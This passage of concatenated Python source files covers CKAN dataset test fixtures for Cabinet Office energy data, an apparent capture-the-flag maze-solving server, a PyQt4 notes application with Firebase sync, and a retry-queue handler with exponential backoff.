"geographic_granularity": "point",
"geographic_coverage": [ ],
"state": "active",
"version": None,
"temporal_coverage-to": "",
"license_id": "uk-ogl",
"type": "dataset",
"published_via": "",
"resources":
[
{
"content_length": "69837",
"cache_url": "http://data.gov.uk/data/resource_cache/f1/f156019d-ea88-46a6-8fa3-3d12582e2161/elec00.csv",
"hash": "6f1e452320dafbe9a5304ac77ed7a4ff79bfafc3",
"description": "70 Whitehall energy data",
"cache_last_updated": "2013-06-19T00:59:42.762642",
"url": "http://data.carbonculture.net/orgs/cabinet-office/70-whitehall/reports/elec00.csv",
"openness_score_failure_count": "0",
"format": "CSV",
"cache_filepath": "/mnt/shared/ckan_resource_cache/f1/f156019d-ea88-46a6-8fa3-3d12582e2161/elec00.csv",
"tracking_summary":
{
"total": 0,
"recent": 0
},
"last_modified": "2014-05-09T23:00:01.435211",
"mimetype": "text/csv",
"content_type": "text/csv",
"openness_score": "3",
"openness_score_reason": "open and standardized format",
"position": 0,
"revision_id": "4fca759e-d340-4e64-b75e-22ee1d42c2b4",
"id": "f156019d-ea88-46a6-8fa3-3d12582e2161",
"size": 299107
}
],
"num_resources": 1,
"tags":
[
{
"vocabulary_id": None,
"display_name": "consumption",
"name": "consumption",
"revision_timestamp": "2010-08-02T09:19:47.600853",
"state": "active",
"id": "84ce26de-6711-4e85-9609-f7d8a87b0fc8"
},
{
"vocabulary_id": None,
"display_name": "energy",
"name": "energy",
"revision_timestamp": "2010-08-02T09:19:47.600853",
"state": "active",
"id": "9f2ae723-602f-4290-80c4-6637ad617a45"
}
],
"precision": "",
"tracking_summary":
{
"total": 0,
"recent": 0
},
"taxonomy_url": "",
"groups": [{"id": "remote-group-id", "name": "remote-group"}],
"groups": [],
"creator_user_id": None,
"national_statistic": "no",
"relationships_as_subject": [],
"num_tags": 8,
"update_frequency-other": "Real-time",
"isopen": True,
"url": "http://www.carbonculture.net/orgs/cabinet-office/70-whitehall/",
"notes": "Cabinet Office head office energy use updated from on-site meters showing use, cost and carbon impact.",
"owner_org": "aa1e068a-23da-4563-b9c2-2cad272b663e",
"theme-secondary":
[
"Environment"
],
"extras":
[
{
"package_id": "1c65c66a-fdec-4138-9c64-0f9bf087bcbb",
"value": "",
"revision_timestamp": "2010-08-02T09:19:47.600853",
"state": "active",
"key": "categories",
"revision_id": "08bac459-1d44-44fb-b388-20f4d8394364",
"id": "6813d71b-785b-4f56-b296-1b2acb34eed6"
},
{
"package_id": "1c65c66a-fdec-4138-9c64-0f9bf087bcbb",
"value": "2010-07-30",
"revision_timestamp": "2010-08-02T09:19:47.600853",
"state": "active",
"key": "date_released",
"revision_id": "08bac459-1d44-44fb-b388-20f4d8394364",
"id": "515f638b-e2cf-40a6-a8a7-cbc8001269e3"
},
{
"package_id": "1c65c66a-fdec-4138-9c64-0f9bf087bcbb",
"value": "",
"revision_timestamp": "2010-08-02T09:19:47.600853",
"state": "active",
"key": "date_updated",
"revision_id": "08bac459-1d44-44fb-b388-20f4d8394364",
"id": "bff63465-4f96-44e7-bb87-6e66fff5e596"
},
{
"package_id": "1c65c66a-fdec-4138-9c64-0f9bf087bcbb",
"value": "000000: ",
"revision_timestamp": "2010-08-02T09:19:47.600853",
"state": "active",
"key": "geographic_coverage",
"revision_id": "08bac459-1d44-44fb-b388-20f4d8394364",
"id": "414bcd35-b628-4218-99e2-639615183df8"
},
{
"package_id": "1c65c66a-fdec-4138-9c64-0f9bf087bcbb",
"value": "point",
"revision_timestamp": "2010-08-02T09:19:47.600853",
"state": "active",
"key": "geographic_granularity",
"revision_id": "08bac459-1d44-44fb-b388-20f4d8394364",
"id": "c7b460dd-c61f-4cd2-90c2-eceb6c91fe9b"
},
{
"package_id": "1c65c66a-fdec-4138-9c64-0f9bf087bcbb",
"value": "no",
"revision_timestamp": "2010-08-02T09:19:47.600853",
"state": "active",
"key": "national_statistic",
"revision_id": "08bac459-1d44-44fb-b388-20f4d8394364",
"id": "9f04b202-3646-49be-b69e-7fa997399ff3"
},
{
"package_id": "1c65c66a-fdec-4138-9c64-0f9bf087bcbb",
"value": "{\"status\": \"final\", \"source\": \"Automatically awarded by ODI\", \"certification_type\": \"automatically awarded\", \"level\": \"raw\", \"title\": \"Cabinet Office 70 Whitehall energy use\", \"created_at\": \"2014-10-28T12:25:57Z\", \"jurisdiction\": \"GB\", \"certificate_url\": \"https://certificates.theodi.org/datasets/5480/certificates/17922\", \"badge_url\": \"https://certificates.theodi.org/datasets/5480/certificates/17922/badge.png\", \"cert_title\": \"Basic Level Certificate\"}",
"revision_timestamp": "2014-11-12T02:52:35.048060",
"state": "active",
"key": "odi-certificate",
"revision_id": "eae9763b-e258-4d76-9ec2-7f5baf655394",
"id": "373a3cbb-d9c0-45a6-9a78-b95c86398766"
},
{
"package_id": "1c65c66a-fdec-4138-9c64-0f9bf087bcbb",
"value": "",
"revision_timestamp": "2010-08-02T09:19:47.600853",
"state": "active",
"key": "temporal_coverage-from",
"revision_id": "08bac459-1d44-44fb-b388-20f4d8394364",
"id": "39f72eed-6f76-4733-b636-7541cee3404f"
},
{
"package_id": "1c65c66a-fdec-4138-9c64-0f9bf087bcbb",
"value": "",
"revision_timestamp": "2010-08-02T09:19:47.600853",
"state": "active",
"key": "temporal_coverage-to",
"revision_id": "08bac459-1d44-44fb-b388-20f4d8394364",
"id": "818e2c8f-fee0-49da-8bea-ea3c9401ece5"
},
{
"package_id": "1c65c66a-fdec-4138-9c64-0f9bf087bcbb",
"value": "",
"revision_timestamp": "2010-08-02T09:19:47.600853",
"state": "active",
"key": "temporal_granularity",
"revision_id": "08bac459-1d44-44fb-b388-20f4d8394364",
"id": "f868b950-d3ce-4fbe-88ca-5cbc4b672320"
},
{
"package_id": "1c65c66a-fdec-4138-9c64-0f9bf087bcbb",
"value": "Towns & Cities",
"revision_timestamp": "2015-03-16T18:10:08.802815",
"state": "active",
"key": "theme-primary",
"revision_id": "fc2b6630-84f8-4c88-8ac7-0ca275b2bc97",
"id": "bdcf00fd-3248-4c2f-9cf8-b90706c88e8d"
},
{
"package_id": "1c65c66a-fdec-4138-9c64-0f9bf087bcbb",
"value": "[\"Environment\"]",
"revision_timestamp": "2015-04-08T20:57:04.895214",
"state": "active",
"key": "theme-secondary",
"revision_id": "c2c48530-ff82-4af1-9373-cdc64d5bc83c",
"id": "417482c5-a9c0-4430-8c4e-0c76e59fe44f"
},
{
"package_id": "1c65c66a-fdec-4138-9c64-0f9bf087bcbb",
"value": "Real-time",
"revision_timestamp": "2010-08-02T09:19:47.600853",
"state": "active",
"key": "update_frequency",
"revision_id": "08bac459-1d44-44fb-b388-20f4d8394364",
"id": "e8ad4837-514e-4446-81a2-ffacfa7cf683"
}
],
"license_url": "http://www.nationalarchives.gov.uk/doc/open-government-licence/version/3/",
"individual_resources":
[
{
"content_length": "69837",
"cache_url": "http://data.gov.uk/data/resource_cache/f1/f156019d-ea88-46a6-8fa3-3d12582e2161/elec00.csv",
"hash": "6f1e452320dafbe9a5304ac77ed7a4ff79bfafc3",
"description": "70 Whitehall energy data",
"cache_last_updated": "2013-06-19T00:59:42.762642",
"url": "http://data.carbonculture.net/orgs/cabinet-office/70-whitehall/reports/elec00.csv",
"openness_score_failure_count": "0",
"format": "CSV",
"cache_filepath": "/mnt/shared/ckan_resource_cache/f1/f156019d-ea88-46a6-8fa3-3d12582e2161/elec00.csv",
"tracking_summary":
{
"total": 0,
"recent": 0
},
"last_modified": "2014-05-09T23:00:01.435211",
"mimetype": "text/csv",
"content_type": "text/csv",
"openness_score": "3",
"openness_score_reason": "open and standardized format",
"position": 0,
"revision_id": "4fca759e-d340-4e64-b75e-22ee1d42c2b4",
"id": "f156019d-ea88-46a6-8fa3-3d12582e2161",
"size": 299107
}
],
"title": "Cabinet Office 70 Whitehall energy use",
"revision_id": "3bd6ced3-35b2-4b20-94e2-c596e24bc375",
"date_released": "30/7/2010",
"theme-primary": "Towns & Cities"
}
]
INVALID_TAGS = [
{
"vocabulary_id": None,
"display_name": "consumption%^&",
"name": "consumption%^&",
"revision_timestamp": "2010-08-02T09:19:47.600853",
"state": "active",
"id": "84ce26de-6711-4e85-9609-f7d8a87b0fc8"
},
]
ORGS = [
{'id': 'org1-id',
'name': 'org1'},
{'id': 'aa1e068a-23da-4563-b9c2-2cad272b663e',
'name': 'cabinet-office'}
]
GROUPS = [
{'id': 'group1-id',
'name': 'group1'},
{'id': '9853c3e1-eebb-4e8c-9ae7-1668a01bf2ca',
'name': 'finances'}
]
REVISIONS = [
{
"id": "23daf2eb-d7ec-4d86-a844-3924acd311ea",
"timestamp": "2015-10-21T09:50:08.160045",
"message": "REST API: Update object dataset1",
"author": "ross",
"approved_timestamp": None,
"packages":
[
DATASETS[1]['id']
],
"groups": [ ]
},
{
"id": "8254a293-10db-4af2-9dfa-6a1f06ee899c",
"timestamp": "2015-10-21T09:46:21.198021",
"message": "REST API: Update object dataset1",
"author": "ross",
"approved_timestamp": None,
"packages":
[
DATASETS[1]['id']
],
"groups": [ ]
}]
|
server.py
|
#!/usr/bin/env python3
from __future__ import annotations
from maze import RandomMaze
import os, socketserver, threading
import solver
HOST, PORT = "0.0.0.0", int(os.environ.get("PORT", 24001))
flag = open('flag', 'r').readline()
'''
Main component: presents the maze to the user and
verifies the answer sent back.
'''
class ThreadedTCPRequestHandler(socketserver.StreamRequestHandler):
def handle(self):
m = RandomMaze(89, 51)
self.wfile.write(b"You have 2 seconds to send back a valid path between S and E\n")
self.wfile.write(b"(ex: RIGHT,RIGHT,RIGHT,DOWN,RIGHT,RIGHT,UP,UP,UP,UP,UP,LEFT)\n")
self.wfile.write(f"{m}\n\n".encode())
self.data = self.rfile.readline().strip()
print(f"{self.client_address[0]} wrote: {self.data.decode()}")
result = solver.follow_path(m, self.data.decode())
if result is not None and result.val == "E":
print("Success!")
self.wfile.write(f"{flag}\n".encode())
else:
print("Failure!")
self.wfile.write(b"Wrong path; Try harder\n")
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
if __name__ == "__main__":
server = ThreadedTCPServer((HOST, PORT), ThreadedTCPRequestHandler)
server_thread = threading.Thread(target=server.serve_forever)
server_thread.start()
print("Server loop running in thread:", server_thread.name)
|
MainWindow.py
|
from PyQt4.QtGui import *
from PyQt4.QtCore import *
import Configuration as cfg
import datetime, calendar, threading, time, uuid
import ExcelDBOps as dbop
import FirebaseConn as fb
class MainWindowApplication(QMainWindow):
def __init__(self):
super(MainWindowApplication, self).__init__()
self.setUpDBDaemon()
self.initUi()
self.currentWorkingDate = ''
def setUpDBDaemon(self):
self.thread_stop_flag = True
self.t = threading.Thread(target=self.setUpDBDaemonLooper, args=())
self.t.daemon = True
self.t.start()
def setUpDBDaemonLooper(self):
while self.thread_stop_flag:
# try:
self.R()
time.sleep(5)
# except:
# print("Error in daemon.")
def R(self):
try:
nFB_res_data = fb.getAllDataCount()
except:
return
nDB = dbop.getAllDataCount()
if nDB == 0 and len(nFB_res_data.keys()) > 0:
dbop.justInsert(nFB_res_data)
self.fillDataIntoTable()
elif nDB > 0 and nFB_res_data is None:
res = dbop.getAllData()
for k in res.keys():
data = {
"note": str(res[k][0]),
"datestamp": str(res[k][1]),
"hashval": str(res[k][2]),
"lastchanged": str(res[k][3])
}
try:
newId = fb.insertData(data)
except:
return
dbop.updateNoteID(str(k), str(newId['name']))
self.fillDataIntoTable()
else:
resFb = nFB_res_data
resDb = dbop.getAllData()
# Local Deleted Elements
for k in resDb:
if resDb[k][2] == 'delete':
try:
fb.deleteNote(str(k), "")
except:
continue
dbop.finalDelete(k)
# Check if the matching ID's hash is same and then if the local lastChanged > firebase lastChanged
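            # Illustrative example of the comparison below (made-up values):
            #   local : hashval differs, lastchanged "2020-01-02 10:00:01"
            #   remote: lastchanged "2020-01-02 09:59:58"
            # After trimming fractional seconds, the strings compare in
            # chronological order, so the newer local note is pushed with
            # fb.editNode; otherwise the Firebase copy wins and the local row
            # is updated via dbop.updateDataAsPerId.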
for k in resDb:
try:
h = (resFb[k]['hashval'])
except:
data = {
"note": str(resDb[k][0]),
"datestamp": str(resDb[k][1]),
"hashval": str(resDb[k][2]),
"lastchanged": str(resDb[k][3])
}
try:
newId = fb.insertData(data)
except:
return
dbop.updateNoteID(str(k), str(newId['name']))
for k in resDb:
if str(resDb[k][2]) != str(resFb[k]['hashval']):
localTimeTMP = resDb[k][3]
if localTimeTMP.__contains__("."):
localTimeTMP = localTimeTMP[:localTimeTMP.index('.')]
orginTimeTMP = resFb[k]['lastchanged']
if orginTimeTMP.__contains__("."):
orginTimeTMP = orginTimeTMP[:orginTimeTMP.index('.')]
if localTimeTMP > orginTimeTMP:
# print("Local id better...")
fb.editNode(
str(k),
str(resDb[k][1]),
str(resDb[k][2]),
str(resDb[k][3])
)
elif localTimeTMP < orginTimeTMP:
# print("FB id better...")
dbop.updateDataAsPerId(
str(k),
resFb[k]['note'],
resFb[k]['lastchanged']
)
else:
pass
# print("Both OK")
self.fillDataIntoTable()
def initUi(self):
self.setWindowTitle(cfg.APPLICATION_TITLE)
self.setMinimumSize(800, 650)
self.setWindowIcon(QIcon('./src/icon_notes.png'))
# self.setWindowFlags(Qt.FramelessWindowHint)
self.gLayout = QVBoxLayout()
# set Header UI
self.uiHeader()
self.uiTableBody()
self.uiBottom()
# sub layouts
# Sub layout Prop
# Widgets
# Widget Props
# Add to sub layout
# Add to main layout
# setting central widget
mainVLayoutWidget = QWidget()
mainVLayoutWidget.setLayout(self.gLayout)
self.setCentralWidget(mainVLayoutWidget)
self.showMaximized()
self.show()
def uiHeader(self):
self.hlayoutHeader = QGridLayout()
# sub layouts
# Sub layout Prop
# Widgets
self.labelDayOfWeekAndDate = QLabel()
self.labelMonth = QLabel()
self.labelNoOfTasks = QLabel()
self.btnDateSelecter = QLabel("<html><img src='./src/icon_down_arrow.png' width='32' height='32'></html>")
# Widget Props
self.labelDayOfWeekAndDate.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
self.labelDayOfWeekAndDate.setStyleSheet("font-size: 30px;")
self.labelMonth.setStyleSheet("font-size: 15px;")
self.labelNoOfTasks.setAlignment(Qt.AlignRight)
self.btnDateSelecter.setAlignment(Qt.AlignLeft)
self.btnDateSelecter.setToolTip("Date picker")
# Add to sub layout
# Add to main layout
self.hlayoutHeader.addWidget(self.labelDayOfWeekAndDate, 0, 0)
self.hlayoutHeader.addWidget(self.labelMonth, 1, 0)
self.hlayoutHeader.addWidget(self.btnDateSelecter, 0, 1)
self.hlayoutHeader.addWidget(self.labelNoOfTasks, 0, 2, 2, 1)
# Listener
self.btnDateSelecter.mousePressEvent = self.clickSelectDate
# Initialize Texts
today = datetime.date.today()
self.currentWorkingDate = today
noOfTasks = 0
self.setHeaderLabelValues(today, noOfTasks)
# default values
self.gLayout.addLayout(self.hlayoutHeader)
def setHeaderLabelValues(self, today, noOfTasks):
self.labelDayOfWeekAndDate.setText(calendar.day_name[today.weekday()] + ", " + str(today.day))
self.labelMonth.setText(str(calendar.month_name[today.month]) + ", " + str(today.year))
self.labelNoOfTasks.setText(str(noOfTasks) + " Notes")
def clickSelectDate(self, e):
self.selectDateDialog = QDialog()
self.vbox = QVBoxLayout()
self.calenderWidget = QCalendarWidget()
self.btnDone = QPushButton("Done")
self.calenderWidget.setGridVisible(True)
self.vbox.addWidget(self.calenderWidget)
self.vbox.addWidget(self.btnDone)
self.selectDateDialog.setLayout(self.vbox)
self.btnDone.clicked.connect(self.loadDate)
self.selectDateDialog.exec_()
def loadDate(self):
ca = self.calenderWidget.selectedDate()
y = ca.year()
m = ca.month()
d = ca.day()
self.selectDateDialog.close()
self.setHeaderLabelValues(datetime.date(y, m, d), 0)
self.fillDataIntoTable()
def uiTableBody(self):
# sub layouts
# Sub layout Prop
# Widgets
self.table = QTableWidget()
self.table.setColumnCount(4)
self.table.setHorizontalHeaderLabels(["Id", "Date", "Time", "Note"])
self.table.horizontalHeader().setStretchLastSection(True)
self.table.verticalHeader().setVisible(False)
self.table.setEditTriggers(QAbstractItemView.NoEditTriggers)
self.table.setSelectionBehavior(QAbstractItemView.SelectRows)
self.table.setRowHeight(100, 100)
# Widget Props
# Add to sub layout
# Add to main layout
self.gLayout.addWidget(self.table)
# Listener
# Initialize Texts
# default values
self.fillDataIntoTable()
def fillDataIntoTable(self):
d = str(self.labelDayOfWeekAndDate.text()).split(" ")[1]
tmp = str(self.labelMonth.text()).split(", ")
y = tmp[1]
m = datetime.datetime.strptime(tmp[0], "%B")
m = m.month
if len(str(m)) == 1:
m = "0" + str(m)
if len(str(d)) == 1:
d = "0" + str(d)
tmpDate = y + '-' + m + '-' + d
data = dbop.getDataAsPerDate(str(tmpDate))
n = len(data.keys())
self.table.clearContents()
        self.labelNoOfTasks.setText(str(n) + " Notes")
self.table.setRowCount(n)
cnt = 0
for k in data.keys():
hashVal = data[k][2]
if hashVal != 'delete':
timeStampTmp = data[k][1].split(" ")
self.table.setItem(cnt, 0, QTableWidgetItem(k))
self.table.setItem(cnt, 1, QTableWidgetItem(timeStampTmp[0]))
self.table.setItem(cnt, 2, QTableWidgetItem(timeStampTmp[1]))
self.table.setItem(cnt, 3, QTableWidgetItem(data[k][0]))
cnt += 1
def uiBottom(self):
# sub layouts
self.hboxLayoutButtons = QHBoxLayout()
# Sub layout Prop
self.hboxLayoutButtons.setAlignment(Qt.AlignRight)
# Widgets
self.btnAddNote = QLabel("<html><img src='./src/icon_add.png' width='32' height='32'></html>")
self.btnEditNote = QLabel("<html><img src='./src/icon_edit.png' width='32' height='32'></html>")
self.btnDeleteNote = QLabel("<html><img src='./src/icon_delete.png' width='32' height='32'></html>")
# Widget Props
self.btnAddNote.setToolTip("Add New Note...")
self.btnEditNote.setToolTip("Edit Note...")
self.btnDeleteNote.setToolTip("Delete Note...")
# Add to sub layout
self.hboxLayoutButtons.addWidget(self.btnAddNote)
self.hboxLayoutButtons.addWidget(self.btnEditNote)
self.hboxLayoutButtons.addWidget(self.btnDeleteNote)
# Add to main layout
self.gLayout.addLayout(self.hboxLayoutButtons)
# Listener
self.btnAddNote.mousePressEvent = self.clickAddNewNote
self.btnEditNote.mousePressEvent = self.clickEditNote
self.btnDeleteNote.mousePressEvent = self.clickDeleteNote
# Initialize Texts
# default values
def clickAddNewNote(self, e):
d = str(self.labelDayOfWeekAndDate.text()).split(" ")[1]
tmp = str(self.labelMonth.text()).split(", ")
y = tmp[1]
m = datetime.datetime.strptime(tmp[0], "%B")
m = m.month
if len(str(m)) == 1:
m = "0" + str(m)
if len(str(d)) == 1:
d = "0" + str(d)
if datetime.date(int(y), int(m), int(d)) < datetime.date.today():
msg = QMessageBox()
msg.setWindowTitle("Error")
msg.setIcon(QMessageBox.Critical)
msg.setText("You cannot add new item to older dates.")
msg.exec_()
return
else:
self.addNoteDialog = QDialog()
self.addNoteDialog.setWindowTitle("+Add Note")
self.addNoteDialog.setWindowIcon(QIcon("./src/icon_notes.png"))
self.addNoteDialog.setFixedSize(500, 300)
self.editText = QTextEdit()
self.btnSave = QPushButton("Save")
self.btnCancel = QPushButton("Cancel")
grid = QGridLayout()
grid.addWidget(QLabel("Note"), 0, 0)
grid.addWidget(self.editText, 1, 0, 1, 3)
grid.addWidget(self.btnSave, 2, 1)
grid.addWidget(self.btnCancel, 2, 2)
self.addNoteDialog.setLayout(grid)
self.btnSave.clicked.connect(self.saveNewNote)
self.btnCancel.clicked.connect(lambda: self.addNoteDialog.close())
self.addNoteDialog.exec_()
def saveNewNote(self):
        id = ''
timestamp = datetime.datetime.now()
data = {
"note": str(self.editText.toPlainText()),
"datestamp": str(timestamp),
"hashval": hash(str(timestamp)),
"lastchanged": str(timestamp)
}
try:
id = fb.insertData(data)
except:
msg = QMessageBox()
msg.setWindowTitle("Error!")
msg.setIcon(QMessageBox.Critical)
msg.setText("You are not connected to internet. Please connect for a better experience.")
msg.exec_()
if id == '':
id = uuid.uuid1()
dbop.insertDatSQL(id, str(self.editText.toPlainText()), str(timestamp))
today = datetime.date.today()
self.currentWorkingDate = today
self.fillDataIntoTable()
self.addNoteDialog.close()
msg = QMessageBox()
msg.setWindowTitle("Done!")
msg.setText("New Note Saved.")
msg.exec_()
def clickEditNote(self, e):
index = self.table.selectionModel().currentIndex()
tmpNote = index.sibling(index.row(), 3).data()
# tmpTimeStamp = index.sibling(index.row(), 1).data() + " " + index.sibling(index.row(), 2).data()
tmpId = index.sibling(index.row(), 0).data()
if tmpId is None:
msg = QMessageBox()
msg.setWindowTitle("Error")
msg.setIcon(QMessageBox.Critical)
msg.setText("There are not items in this date for you to edit or you have not yet selected any note. "
"Please select a note you want to edit and try again")
msg.exec_()
return
else:
self.editNoteDialog = QDialog()
self.editNoteDialog.setWindowTitle("Edit Note")
self.editNoteDialog.setWindowIcon(QIcon("./src/icon_notes.png"))
self.editNoteDialog.setFixedSize(500, 300)
self.editText = QTextEdit()
self.btnEditSave = QPushButton("Save")
self.btnCancel = QPushButton("Cancel")
self.editText.setText(tmpNote)
grid = QGridLayout()
grid.addWidget(QLabel("Note"), 0, 0)
grid.addWidget(self.editText, 1, 0, 1, 3)
grid.addWidget(self.btnEditSave, 2, 1)
grid.addWidget(self.btnCancel, 2, 2)
self.editNoteDialog.setLayout(grid)
self.btnEditSave.clicked.connect(lambda : self.saveEditNote(tmpId))
self.btnCancel.clicked.connect(lambda: self.editNoteDialog.close())
self.editNoteDialog.exec_()
def saveEditNote(self, id):
dm = datetime.datetime.now()
try:
            fb.editNode(id, self.editText.toPlainText(), hash(str(dm)), str(dm))
except:
msg = QMessageBox()
msg.setWindowTitle("Error!")
msg.setIcon(QMessageBox.Critical)
msg.setText("You are not connected to internet. Please connect for a better experience.")
msg.exec_()
dbop.updateDataAsPerId(id, self.editText.toPlainText(), dm)
self.editNoteDialog.close()
msg = QMessageBox()
msg.setWindowTitle("Done!")
msg.setText("Note has been updated.")
msg.exec_()
self.fillDataIntoTable()
def clickDeleteNote(self, e):
index = self.table.selectionModel().currentIndex()
tmpId = index.sibling(index.row(), 0).data()
print(tmpId)
if tmpId is None or tmpId == '':
msg = QMessageBox()
msg.setWindowTitle("Error")
msg.setIcon(QMessageBox.Critical)
msg.setText("You cannot add new item to older dates.")
msg.exec_()
return
else:
msg = QMessageBox()
msg.setWindowTitle("Delete!")
msg.setIcon(QMessageBox.Information)
msg.setText("Are you sure you want to delete this note?")
msg.addButton(QMessageBox.Yes)
msg.addButton(QMessageBox.No)
res = msg.exec_()
if res == QMessageBox.Yes:
dm = str(datetime.datetime.now())
try:
fb.deleteNote(tmpId, dm)
except:
msg = QMessageBox()
msg.setWindowTitle("Error")
msg.setIcon(QMessageBox.Critical)
msg.setText("You are not connected to the internet. Please connect to internet for a better experience.")
msg.exec_()
dbop.deleteNoteById(tmpId, dm)
msg = QMessageBox()
msg.setWindowTitle("Done!")
msg.setText("Note has been deleted.")
msg.exec_()
self.fillDataIntoTable()
def close(self):
self.thread_stop_flag = False
|
retryhandler.py
|
import sys, time, threading, os, traceback, logging
from queue import Queue
class RetryHandler:
def __init__(self, evaluator, maxTries = 10, waitTimeSeconds = 2, expBackoff = True, maxQueued = 0):
self._evaluator = evaluator
self._maxTries = maxTries
self._waitTime = waitTimeSeconds
self._expBackoff = expBackoff
self._queue = Queue(maxQueued)
self._tries = 0
self._failedRequest = None
self._shouldJoin = False
self._workerThread = None
def startWorker(self):
def worker():
logging.debug("Started queue-worker")
while not (self._shouldJoin and self._queue.empty()):
self._processQueue()
self._workerThread = threading.Thread(name="queue-worker", target=worker)
self._workerThread.start()
def joinWorker(self):
self._shouldJoin = True
self._workerThread.join()
def enqueue(self, r):
self._queue.put(r)
def _processQueue(self):
request = None
        if self._failedRequest is not None:
logging.info('Retrying failed request')
request = self._failedRequest
else:
try:
request = self._queue.get(timeout=2)
logging.debug('Processing queued request (' + str(self._queue.qsize()) + ' remaining)')
except:
return
try:
self._evaluator.eval(request)
logging.debug('Successfully handled request')
self._tries = 0
self._failedRequest = None
except Exception:
logging.exception("Exception when evaluating request")
self._tries += 1
self.checkMaxTries()
self._failedRequest = request
            waitTime = self._computeWaitTime()
            logging.warning(self._triesStr() + ' Retry in: ' + str(waitTime) + ' seconds')
            time.sleep(waitTime)
def checkMaxTries(self):
if self._tries >= self._maxTries:
logging.error('Exceeded the maximum amount of retries! Shutting down.')
os._exit(-1)
def _triesStr(self):
return '(' + str(self._tries) + '/' +str(self._maxTries) + ')'
    def _computeWaitTime(self):
if self._expBackoff:
return self._waitTime*(2**(self._tries-1))
else:
return self._waitTime
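# Usage sketch (hypothetical evaluator; any object exposing eval(request)
# works with this class):
#     class PrintEvaluator:
#         def eval(self, request):
#             print("handled", request)
#     handler = RetryHandler(PrintEvaluator(), maxTries=3, waitTimeSeconds=1)
#     handler.startWorker()
#     handler.enqueue({"id": 1})
#     handler.joinWorker()
# With expBackoff=True the delay grows as waitTimeSeconds * 2**(tries - 1),
# i.e. 1 s, 2 s, 4 s, ... for waitTimeSeconds=1.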
|